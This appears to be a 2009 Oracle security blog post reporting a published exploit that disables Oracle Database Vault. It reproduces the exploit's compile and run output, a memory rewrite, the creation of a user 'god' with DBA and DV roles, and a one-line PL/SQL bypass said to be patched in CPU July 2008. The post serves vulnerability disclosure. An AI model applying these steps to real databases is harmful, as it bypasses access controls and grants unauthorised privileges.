- 11g (5)
- Allgemein (15)
- checkpwd (4)
- CPUApril2009 (2)
- CPUJan2009 (3)
- David Litchfield (5)
- Exploit (12)
- Forensics (4)
- Oracle Security (65)
- passwords (5)
- Security (12)
- Sentrigo (5)
- software (6)
- source code audit (3)
- SQL Injection (15)
- Tools (10)
- Trainings (1)
- Tutorial (2)
- 16 Mai 2009: Presentation from Confidence 2009 available
- 1 Mai 2009: Perl - Script to run OS commands via Oracle based Web Apps released
- 23 Apr 2009: SQLMap 0.7 rc is out
- 21 Apr 2009: Listener Exploit (April 2009) from Dennis Yurichev published
- 20 Apr 2009: Whitepaper: Penetration from Application down to OS
- 20 Apr 2009: Pangolin 2.0.2.820 with enhanced Oracle support
- 16 Apr 2009: 3 new Oracle Security Videos
- 16 Apr 2009: SQL Injection Tool Pangolin 2.0 published
- 15 Apr 2009: Oracle Database Scanner Repscan 2.5 trial available
- 14 Apr 2009: Oracle Critical Patch Update April 2009 (CPUApr2009) is out
Oracle Security
Other Blogs
SQL Injection
Trainings
Oracle Database Vault Privilege Escalation Exploit published
Few days ago Jakub Wartak has posted an exploit showing how to switch DV off on his blog.Jakub describes that he was surprised that Data Vault does not protect from OS side. That’s something many people are not aware of. Oracle Data Vault is not designed to protect from normal DBAs (with OS access).Here the usage of his exploit:
[oracle@xeno ora_dv_mem_off]$ !gcc [oracle@xeno ora_dv_mem_off]$ ./ora_dv_mem_off SQL*Plus: Release 10.2.0.3.0 - Production on Wed Feb 27 18:56:55 2008 Copyright (c) 1982, 2006, Oracle. All Rights Reserved. SQL> conn / as sysdba User created. SQL> grant dba,dv_admin,dv_owner,connect,resource to god; Grant succeeded. Here is another (easier) way to bypass Data Vault without installing/compiling software. I found this issue a few months ago (in Oracle 11.1.0.6). After contacting secalert they told me that this issue was already fixed in Oracle CPU July 2008 (but not documented): – run as user with DBA privleges SQL> exec sys.kupp$proc.change_user(’DVA’); PL/SQL procedure successfully completed.
gcc -Wall ora_dv_mem_off.c -o ora_dv_mem_off -lbfd -liberty
ora_dv_mem_off.c: In function ‘locate_dv_func’:
ora_dv_mem_off.c:92: warning: initialization discards qualifiers from pointer
target type
ora_dv_mem_off.c:93: warning: initialization makes pointer from integer
without a cast
[17035] starting to trace sqlplus process (17036)
[***] NOW TYPE IN SQLPLUS: conn / as sysdba
[17035] execve() syscall in 17036
[17035] clone() syscall in 17036, tracing orapid=17037
[17035] execve() syscall in 17037,
[17035] symbol “kzvtins” at 0xb185820
[***] sucessfuly validated function, DatabaseVault=1
[***] attempting to rewrite memory at 0xb185824
Connected.
SQL> create user god identified by abc;
Antwort schreiben
Sie müssen als angemeldet sein, um einen Kommentar schreiben zu können.